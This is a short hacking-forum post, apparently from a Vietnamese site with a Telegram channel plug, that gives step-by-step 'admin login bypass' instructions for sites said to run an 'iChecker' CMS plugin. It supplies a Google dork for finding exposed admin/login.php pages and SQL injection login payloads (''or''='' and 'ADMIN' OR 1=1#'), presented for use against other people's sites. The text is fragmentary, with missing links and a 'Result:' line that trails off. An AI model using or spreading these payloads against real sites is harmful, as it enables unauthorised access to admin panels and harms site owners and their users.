—————————————————————————————————
I found a website and I found that its admin page can be accessed simply with a method of bypassing the authentication.
Then I searched other sites with Dork on to scan them, and I found many sites that are prone to the same error!
So I decided to share this with you guys!
(Killer040)
Instructions for Admin Login Bypass
{-} Vulnerable Versions => Most of the errors are in the CMS of Plugin ‘iChecker’.
Conduct:
Step 1: Find the Admin Link
Use 1 of these 2 links to find Web Admin
Or go to google and type the command:
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
"Sign in to start your session" inurl:admin/login.php
or
User: 'or''=' Pass: 'or''='
or
User: ADMIN' OR 1=1# Pass: ADMIN' OR 1=1#
Result: